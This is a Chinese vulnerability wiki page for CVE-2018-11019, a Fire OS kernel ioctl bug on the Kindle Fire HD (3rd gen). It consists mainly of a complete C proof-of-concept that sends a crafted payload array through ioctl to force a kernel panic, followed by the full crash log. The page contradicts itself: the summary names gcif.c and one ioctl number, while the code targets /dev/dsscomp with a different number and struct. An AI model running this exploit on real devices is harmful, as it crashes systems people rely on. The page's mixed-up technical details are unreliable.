跳转至

CVE-2018-11019)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞

一、漏洞简介

Amazon Kindle Fire HD(3rd)是美国亚马逊(Amazon)公司的一款Fire OS平板电脑设备。Fire OS是运行在其中的一套专用于Amazon设备的基于Android开发的移动操作系统。kernel是其中的一个内核组件。 Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3版本中的kernel组件的kernel/omap/drivers/misc/gcx/gcioctl/gcif.c文件存在安全漏洞。攻击者可借助3221773726命令利用该漏洞注入特制的参数,造成内核崩溃。

二、漏洞影响

Fire OS 4.5.5.3

三、复现过程

poc

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This Poc should run with permission to do ioctl on /dev/dsscomp.
 *
 * The fowllwing is kmsg of kernel crash infomation:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517; 

int main(int argc, char **argv, char **env) {
    unsigned int payload[] = {
    0xffffffff,
    0x00000003,
    0x5d200040,
    0x79900008,
    0x8f5928bd,
    0x78b02422,
    0x00000000,
    0xffffffff,
    0xf4c50400,
    0x007fffff,
    0x8499f562,
    0xffff0400,
    0x001b131d,
    0x60818210,
    0x00000007,
    0xffffffff,
    0x00000000,
    0x9da9041c,
    0xcd980400,
    0x001f03f4,
    0x00000007,
    0x2a34003f,
    0x7c80d8f3,
    0x63102627,
    0xc73643a8,
    0xa28f0665,
    0x00000000,
    0x689e57b4,
    0x01ff0008,
    0x5e7324b1,
    0xae3b003f,
    0x0b174d86,
    0x00000400,
    0x21ffff37,
    0xceb367a4,
    0x00000040,
    0x00000001,
    0xec000f9e,
    0x00000001,
    0x000001ff,
    0x00000000,
    0x00000000,
    0x0000000f,
    0x0425c069,
    0x038cc3be,
    0x0000000f,
    0x00000080,
    0xe5790100,
    0x5b1bffff,
    0x0000d355,
    0x0000c685,
    0xa0070000,
    0x0010ffff,
    0x00a0ff00,
    0x00000001,
    0xff490700,
    0x0832ad03,
    0x00000006,
    0x00000002,
    0x00000001,
    0x81f871c0,
    0x738019cb,
    0xbf47ffff,
    0x00000040,
    0x00000001,
    0x7f190f33,
    0x00000001,
    0x8295769b,
    0x0000003f,
    0x869f2295,
    0xffffffff,
    0xd673914f,
    0x05055800,
    0xed69b7d5,
    0x00000000,
    0x0107ebbd,
    0xd214af8d,
    0xffff4a93,
    0x26450008,
    0x58df0000,
    0xd16db084,
    0x03ff30dd,
    0x00000001,
    0x209aff3b,
    0xe7850800,
    0x00000002,
    0x30da815c,
    0x426f5105,
    0x0de109d7,
    0x2c1a65fc,
    0xfcb3d75f,
    0x00000000,
    0x00000001,
    0x8066be5b,
    0x00000002,
    0xffffffff,
    0x5cf232ec,
    0x680d1469,
    0x00000001,
    0x00000020,
    0xffffffff,
    0x00000400,
    0xd1d12be8,
    0x02010200,
    0x01ffc16f,
    0xf6e237e6,
    0x007f0000,
    0x01ff08f8,
    0x000f00f9,
    0xbad07695,
    0x00000000,
    0xbaff0000,
    0x24040040,
    0x00000006,
    0x00000004,
    0x00000000,
    0xbc2e9242,
    0x009f5f08,
    0x00800000,
    0x00000000,
    0x00000001,
    0xff8800ff,
    0x00000001,
    0x00000000,
    0x000003f4,
    0x6faa8472,
    0x00000400,
    0xec857dd5,
    0x00000000,
    0x00000040,
    0xffffffff,
    0x3f004874,
    0x0000b77a,
    0xec9acb95,
    0xfacc0001,
    0xffff0001,
    0x0080ffff,
    0x3600ff03,
    0x00000001,
    0x8fff7d7f,
    0x6b87075a,
    0x00000000,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    0x001001ff,
    0x00000000,
    0x00000001,
    0xff1f0512,
    0x00000001,
    0x51e32167,
    0xc18c55cc,
    0x00000000,
    0xffffffff,
    0xb4aaf12b,
    0x86edfdbd,
    0x00000010,
    0x0000003f,
    0xabff7b00,
    0xffff9ea3,
    0xb28e0040,
    0x000fffff,
    0x458603f4,
    0xffff007f,
    0xa9030f02,
    0x00000001,
    0x002cffff,
    0x9e00cdff,
    0x00000004,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }

        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}

崩溃日志

[  164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
[  164.802459] pgd = c26ec000
[  164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
[  164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
[  164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[  164.827239] CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
[  164.834686] PC is at dev_ioctl+0x4ac/0x10c4
[  164.839416] LR is at down_timeout+0x40/0x5c
[  164.844146] pc : [<c03178e8>]    lr : [<c006e9b8>]    psr: 60000013
[  164.844146] sp : c25a1e70  ip : c25a1e50  fp : c25a1f04
[  164.857116] r10: 00000000  r9 : d8c0aca8  r8 : bed5c610
[  164.863128] r7 : c0a25b50  r6 : c25a0000  r5 : bed5c610  r4 : 0000000f
[  164.870391] r3 : 00001403  r2 : 00000000  r1 : 20000013  r0 : 00000000
[  164.877807] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
[  164.885894] Control: 10c5387d  Table: 826ec04a  DAC: 00000015
[  164.892303] 
[  164.892333] PC: 0xc0317868:
[  164.897308] 7868  30d22003 33a03000 e3530000 0a0001c5 e3e0500d eaffff02 e1a0200d e3c26d7f
[  164.907989] 7888  e3c6603f e5963008 e2952008 30d22003 33a03000 e3530000 1a000021 e24b3064
[  164.918670] 78a8  e1a01005 e3a02008 e50b3088 e1a00003 ebfcfa5f e3500000 1a00001e e51b4060
[  164.929351] 78c8  e3020710 e59f7bdc ebf4db32 e1a01000 e2870038 ebf55c25 e3500000 1a0002e0
[  164.939880] 78e8  e5943028 e1a08000 e5940024 e1a02007 e2841024 e5803004 e5830000 e5b23070
[  164.950561] 7908  e5871070 e2420038 e5831004 e5843024 e5842028 ebf55bb9 e50b8060 e50b8064
[  164.961212] 7928  ea000006 e24b1064 e50b1088 e51b0088 e3a01008 ebfd0387 e3a03004 e50b3064
[  164.971771] 7948  e5963008 e2952008 30d22003 33a03000 e3530000 1affffc5 e1a00005 e51b1088
[  164.982299] 
[  164.982330] LR: 0xc006e938:
[  164.987426] e938  e1a01000 0a000007 e3a05000 e2433001 e5843008 e1a00004 eb18d7ad e1a00005
[  164.997955] e958  e24bd014 e89da830 e1a00004 e50b1018 eb18d135 e51b1018 e1a05000 eafffff4
[  165.008636] e978  e1a0c00d e92dd878 e24cb004 e1a04000 e1a05001 eb18d91b e5943008 e3530000
[  165.019317] e998  e1a06000 0a000007 e3a05000 e2433001 e5843008 e1a00004 e1a01006 eb18d794
[  165.029846] e9b8  e1a00005 e89da878 e1a01005 e1a00004 eb18d158 e1a05000 eafffff5 e1a0c00d
[  165.040374] e9d8  e92dd800 e24cb004 e5903000 e1a0c000 e3530000 0a00000b e5910008 e5932008
[  165.051055] e9f8  e1500002 da000003 ea000006 e5932008 e1520000 ba000003 e283c004 e5933004
[  165.061737] ea18  e3530000 1afffff8 e5813004 f57ff05f e3a00000 e58c1000 e89da800 e1a0c00d
[  165.072265] 
[  165.072265] SP: 0xc25a1df0:
[  165.077362] 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[  165.087890] 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[  165.098419] 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[  165.109100] 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[  165.119781] 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[  165.130340] 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[  165.141021] 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[  165.151702] 1ed0  c25a1efc c25a1ee0 c02089fc 00000000 c719ab40 00000004 c719ab40 bed5c610
[  165.162353] 
[  165.162384] IP: 0xc25a1dd0:
[  165.167327] 1dd0  c0070df8 c00795ac c25a0000 00000001 00000004 d454d0f4 60000013 00000001
[  165.178009] 1df0  00000001 00000004 d454d000 0000001d c25a1e3c c03178e8 60000013 ffffffff
[  165.188537] 1e10  c25a1e5c bed5c610 c25a1f04 c25a1e28 c06a5318 c0008370 00000000 20000013
[  165.199249] 1e30  00000000 00001403 0000000f bed5c610 c25a0000 c0a25b50 bed5c610 d8c0aca8
[  165.209899] 1e50  00000000 c25a1f04 c25a1e50 c25a1e70 c006e9b8 c03178e8 60000013 ffffffff
[  165.220581] 1e70  00000001 00000028 000fffff c25a1ea0 c25a1edc c25a1e90 c0207454 c00bd920
[  165.231109] 1e90  0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff 0000000f 00000000 ffffffff
[  165.241790] 1eb0  00000002 00000001 00000000 c25a1f14 00000000 00000001 d8c0aca8 d70c5580
[  165.252441] 
[  165.252441] FP: 0xc25a1e84:
[  165.257415] 1e84  c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8 ffffffff
[  165.268066] 1ea4  0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14 00000000
[  165.278717] 1ec4  00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000 c719ab40
[  165.289276] 1ee4  00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08 c0136044
[  165.299926] 1f04  c0317448 00000000 00000000 00000000 00000001 00000000 dd045190 dcf8c440
[  165.310607] 1f24  c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[  165.321136] 1f44  00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004 c25a0000
[  165.331695] 1f64  00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000 00000400
[  165.342346] 
[  165.342376] R6: 0xc259ff80:
[  165.347320] ff80  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[  165.358001] ffa0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  165.368682] ffc0  00000093 00000093 0000008d 00000002 00000000 00000000 00000000 00000000
[  165.379241] ffe0  00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[  165.389770] 0000  00000000 00000002 00000000 d72b0980 c0a0e840 00000001 00000015 c265dc00
[  165.400451] 0020  00000000 c25a0000 c09ddc50 d72b0980 de949300 c1620b40 c25a1b7c c25a1ac8
[  165.411132] 0040  c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[  165.421661] 0060  005634c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[  165.432342] 
[  165.432342] R7: 0xc0a25ad0:
[  165.437316] 5ad0  00010105 01010005 01040901 00040001 ffff0101 00000000 00000000 00040b03
[  165.447875] 5af0  01040101 ffff0100 00000000 00000000 0000ffff 00000000 0e0c0000 01010005
[  165.458526] 5b10  01000105 0000ffff 00000000 0e0c0000 01010005 00000105 01040901 00040001
[  165.469207] 5b30  ffff0101 00000000 00000000 00040b03 01040101 3f3f0100 00010001 01000001
[  165.479736] 5b50  00000000 00000000 00000001 c0a25b5c c0a25b5c c0a25b64 c0a25b64 00000000
[  165.490417] 5b70  00000000 00000001 c0a25b78 c0a25b78 c0a25b80 c0a25b80 00000000 00000000
[  165.500946] 5b90  00000000 c0a25b94 c0a25b94 c0a25b9c c0a25b9c 00000000 00000000 00000001
[  165.511627] 5bb0  c0a25bb0 c0a25bb0 c0a25bb8 c0a25bb8 c0a25bc0 c0a25bc0 c0a25bc8 c0a25bc8
[  165.522186] 
[  165.522186] R9: 0xd8c0ac28:
[  165.527282] ac28  d8c0ac28 d8c0ac28 00000000 00000000 00000000 c06bc674 000200da c09dda58
[  165.537841] ac48  00000000 00000000 d8c0ac50 d8c0ac50 00000000 c0aa5174 c0aa5174 c0aa5148
[  165.548492] ac68  5aefbbda 00000000 00000000 00000000 d8c0ac80 00000000 00000000 00000000
[  165.559020] ac88  00200000 00000000 00000000 d8c0ac94 d8c0ac94 dd3f6080 dd3f6080 00000000
[  165.569702] aca8  000521a4 000003e8 000003e8 00000000 00000000 00000000 c06b9600 dd150400
[  165.580261] acc8  d8c0ad80 dd3ede70 00001064 00000001 0fb00000 5aefbbda 2e19b832 5aefbbda
[  165.590911] ace8  2e19b832 5aefbbda 2e19b832 00000000 00000000 00000000 00000000 00000000
[  165.601593] ad08  00000000 00000000 00000000 00000000 00000001 00000000 00000000 d8c0ad24
[  165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
[  165.619445] Stack: (0xc25a1e70 to 0xc25a2000)
[  165.624359] 1e60:                                     00000001 00000028 000fffff c25a1ea0
[  165.633605] 1e80: c25a1edc c25a1e90 c0207454 c00bd920 0000001e c2db9600 c25a1ed4 c25a1ea8
[  165.642822] 1ea0: ffffffff 0000000f 00000000 ffffffff 00000002 00000001 00000000 c25a1f14
[  165.652038] 1ec0: 00000000 00000001 d8c0aca8 d70c5580 c25a1efc c25a1ee0 c02089fc 00000000
[  165.661102] 1ee0: c719ab40 00000004 c719ab40 bed5c610 d8c0aca8 00000000 c25a1f74 c25a1f08
[  165.670318] 1f00: c0136044 c0317448 00000000 00000000 00000000 00000001 00000000 dd045190
[  165.679565] 1f20: dcf8c440 c25a1f0c c25a0000 bed5c638 bed5c610 c0085d9e c719ab40 00000004
[  165.688781] 1f40: c25a0000 00000000 c25a1f64 00000000 bed5c610 c0085d9e c719ab40 00000004
[  165.697875] 1f60: c25a0000 00000000 c25a1fa4 c25a1f78 c01365e0 c0135fc4 00000000 00000000
[  165.707092] 1f80: 00000400 bed5c638 00010e64 00000000 00000036 c0013e08 00000000 c25a1fa8
[  165.716308] 1fa0: c0013c60 c0136578 bed5c638 00010e64 00000004 c0085d9e bed5c610 bed5c610
[  165.725402] 1fc0: bed5c638 00010e64 00000000 00000036 00000000 00000000 00000000 bed5c624
[  165.734619] 1fe0: 00000000 bed5c5f4 000106a4 0002918c 60000010 00000004 00000000 00000000
[  165.743835] Backtrace: 
[  165.746856] [<c031743c>] (dev_ioctl+0x0/0x10c4) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[  165.756256] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[  165.765502] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  165.774780]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
[  165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028) 
[  165.793060] Board Information: 
[  165.793060]  Revision : 0001
[  165.793060]  Serial    : 0000000000000000
[  165.793090] SoC Information:
[  165.793090]  CPU    : OMAP4470
[  165.793090]  Rev    : ES1.0
[  165.793121]  Type    : HS
[  165.793121]  Production ID: 0002B975-000000CC
[  165.793121]  Die ID    : 1CC60000-50002FFF-0B00935D-11007004
[  165.793121] 
[  165.844757] ---[ end trace aba846a2af6e75b7 ]---
[  165.850097] Kernel panic - not syncing: Fatal exception
[  165.856109] CPU0: stopping
[  165.859252] Backtrace: 
[  165.862274] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[  165.871643]  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
[  165.878784] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[  165.887908] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[  165.897399] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5380>] (__irq_svc+0x40/0x70)
[  165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80)
[  165.912384] fc20:                                                       c153a9f8 00000000
[  165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
[  165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
[  165.940032]  r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
[  165.947052] [<c010a534>] (follow_page+0x0/0x238) from [<c010af94>] (__get_user_pages+0x13c/0x3f0)
[  165.957031] [<c010ae58>] (__get_user_pages+0x0/0x3f0) from [<c010b350>] (get_user_pages+0x50/0x58)
[  165.967102] [<c010b300>] (get_user_pages+0x0/0x58) from [<c00ff544>] (get_user_pages_fast+0x64/0x7c)
[  165.977233]  r4:d8caee3c
[  165.980468] [<c00ff4e0>] (get_user_pages_fast+0x0/0x7c) from [<c01eeff0>] (fuse_copy_fill+0x1bc/0x238)
[  165.990905] [<c01eee34>] (fuse_copy_fill+0x0/0x238) from [<c01ef0a4>] (fuse_copy_one+0x38/0x68)
[  166.000579]  r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
[  166.007690] [<c01ef06c>] (fuse_copy_one+0x0/0x68) from [<c01efe64>] (fuse_dev_do_read+0x3e4/0x69c)
[  166.017761]  r4:dd243c00
[  166.020874] [<c01efa80>] (fuse_dev_do_read+0x0/0x69c) from [<c01f03c0>] (fuse_dev_read+0x84/0x9c)
[  166.030853] [<c01f033c>] (fuse_dev_read+0x0/0x9c) from [<c0124ecc>] (do_sync_read+0xb0/0xf0)
[  166.040222]  r7:00000000 r6:00000000 r5:00000000 r4:00000000
[  166.047363] [<c0124e1c>] (do_sync_read+0x0/0xf0) from [<c01258f4>] (vfs_read+0xa4/0x148)
[  166.056488] [<c0125850>] (vfs_read+0x0/0x148) from [<c01259d8>] (sys_read+0x40/0x78)
[  166.065093]  r8:00040050 r7:b6eaf010 r6:d8e08900 r5:00000000 r4:00000000
[  166.073547] [<c0125998>] (sys_read+0x0/0x78) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[  166.082855]  r8:c0013e08 r7:00000003 r6:b6eaf008 r5:b73828a0 r4:b6eaf010
[  166.091217] CPU0 PC (0) : 0xc0019b2c
[  166.095397] CPU0 PC (1) : 0xc0019b2c
[  166.099456] CPU0 PC (2) : 0xc0019b2c
[  166.103515] CPU0 PC (3) : 0xc0019b2c
[  166.107574] CPU0 PC (4) : 0xc0019b2c
[  166.111785] CPU0 PC (5) : 0xc0019b2c
[  166.115814] CPU0 PC (6) : 0xc0019b2c
[  166.119873] CPU0 PC (7) : 0xc0019b2c
[  166.124084] CPU0 PC (8) : 0xc0019b2c
[  166.128112] CPU0 PC (9) : 0xc0019b2c
[  166.132171] CPU1 PC (0) : 0xc003ee38
[  166.136352] CPU1 PC (1) : 0xc003ee54
[  166.140411] CPU1 PC (2) : 0xc003ee54
[  166.144470] CPU1 PC (3) : 0xc003ee54
[  166.148681] CPU1 PC (4) : 0xc003ee54
[  166.152709] CPU1 PC (5) : 0xc003ee54
[  166.156768] CPU1 PC (6) : 0xc003ee54
[  166.160980] CPU1 PC (7) : 0xc003ee54
[  166.165008] CPU1 PC (8) : 0xc003ee54
[  166.169067] CPU1 PC (9) : 0xc003ee54
[  166.173126] 
[  166.175048] Restarting Linux version 3.4.83-gd2afc0bae69 ([email protected]) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[  166.175079]